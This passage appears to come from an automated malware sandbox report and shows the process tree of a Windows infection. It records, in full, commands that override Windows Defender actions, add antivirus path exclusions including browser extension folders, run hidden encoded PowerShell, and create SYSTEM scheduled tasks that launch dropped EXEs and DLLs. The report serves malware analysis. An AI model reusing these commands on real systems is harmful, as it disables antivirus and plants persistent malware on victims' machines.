    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1456
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2820
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PydvuLgnU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PydvuLgnU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QXtcPRSLZZJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QXtcPRSLZZJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VZsPcsXHqfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VZsPcsXHqfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hZHKEYKgZYhOxOmqCcR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hZHKEYKgZYhOxOmqCcR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sEMTsjgPFAnxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sEMTsjgPFAnxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HmRRQzesPWZrcCVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HmRRQzesPWZrcCVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YfEflelvsosyxfuRn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YfEflelvsosyxfuRn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EqCqHJSkeBlVNfTB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EqCqHJSkeBlVNfTB\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5824
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PydvuLgnU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1832
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PydvuLgnU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PydvuLgnU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QXtcPRSLZZJU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QXtcPRSLZZJU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VZsPcsXHqfUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VZsPcsXHqfUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hZHKEYKgZYhOxOmqCcR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hZHKEYKgZYhOxOmqCcR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sEMTsjgPFAnxC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sEMTsjgPFAnxC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HmRRQzesPWZrcCVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HmRRQzesPWZrcCVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YfEflelvsosyxfuRn /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YfEflelvsosyxfuRn /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EqCqHJSkeBlVNfTB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EqCqHJSkeBlVNfTB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4384
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gwcRTeFje" /SC once /ST 02:19:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:1360
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gwcRTeFje"
  2⤵
  PID:380
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gwcRTeFje"
  2⤵
  PID:2192
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "fKNHOVHjQSXmROVYc" /SC once /ST 15:49:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EqCqHJSkeBlVNfTB\VKJvxqGiGjMcDOq\edgfLjK.exe\" kZ /ensite_iddXD 525403 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:340
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "fKNHOVHjQSXmROVYc"
  2⤵
  PID:4340

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:2780
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4224

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5952

C:\Windows\Temp\EqCqHJSkeBlVNfTB\VKJvxqGiGjMcDOq\edgfLjK.exe
C:\Windows\Temp\EqCqHJSkeBlVNfTB\VKJvxqGiGjMcDOq\edgfLjK.exe kZ /ensite_iddXD 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:2840
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bunLmsPgGqMrVCMrEs"
  2⤵
  PID:5056
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:5200
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:5532
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:320
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:5288
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\PydvuLgnU\NvGONL.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "EvyHZXkcfFClVsN" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:2648
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "EvyHZXkcfFClVsN2" /F /xml "C:\Program Files (x86)\PydvuLgnU\BdZAKbR.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2748
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "EvyHZXkcfFClVsN"
  2⤵
  PID:5600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "EvyHZXkcfFClVsN"
  2⤵
  PID:5476
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "HvPQQGOIpymeos" /F /xml "C:\Program Files (x86)\QXtcPRSLZZJU2\JlUCXRl.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4440
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5196
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iyoWXKQStrGlS2" /F /xml "C:\ProgramData\HmRRQzesPWZrcCVB\fLIhAaM.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3472
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5292
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "luKgGesTpEkTYFixG2" /F /xml "C:\Program Files (x86)\hZHKEYKgZYhOxOmqCcR\GqmIhqK.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4536
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "uqJVUPpMKdkQUlgOcYC2" /F /xml "C:\Program Files (x86)\sEMTsjgPFAnxC\iulUzeX.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2320
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VZQmWUwKKeNqOLWJD" /SC once /ST 06:06:51 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\EqCqHJSkeBlVNfTB\nGJMGJyN\VuCFKFb.dll\",#1 /pOsite_idvcP 525403" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5020
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "VZQmWUwKKeNqOLWJD"
  2⤵
  PID:3412
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "naRpc1" /SC once /ST 12:56:52 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
  2⤵
  - Creates scheduled task(s)
  PID:216
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "naRpc1"
  2⤵
  PID:4784
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "naRpc1"
  2⤵
  PID:5480
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5308
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:4072
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:1012
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:1264
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:5624
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "fKNHOVHjQSXmROVYc"
  2⤵
  PID:1028

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EqCqHJSkeBlVNfTB\nGJMGJyN\VuCFKFb.dll",#1 /pOsite_idvcP 525403
1⤵
PID:684
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EqCqHJSkeBlVNfTB\nGJMGJyN\VuCFKFb.dll",#1 /pOsite_idvcP 525403
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  PID:5892
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "VZQmWUwKKeNqOLWJD"
    3⤵
    PID:2796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc22ac9758,0x7ffc22ac9768,0x7ffc22ac9778
  2⤵
  PID:4636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1788 --field-trial-handle=1860,i,14872205662732479946,15405786620533061828,131072 /prefetch:2
  2⤵
  PID:748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1860,i,14872205662732479946,15405786620533061828,131072 /prefetch:8
  2⤵
  PID:744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2032 --field-trial-handle=1860,i,14872205662732479946,15405786620533061828,131072 /prefetch:8
  2⤵
  PID:660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3180 --field-trial-handle=1860,i,14872205662732479946,15405786620533061828,131072 /prefetch:1
  2⤵
  PID:1832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3544 --field-trial-handle=1860,i,14872205662732479946,15405786620533061828,131072 /prefetch:1
  2⤵
  PID:5180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3552 --field-trial-handle=1860,i,14872205662732479946,15405786620533061828,131072 /prefetch:1
  2⤵
  PID:3532
- C:\Program Files\Google\Chrome\Application\chrome.exe
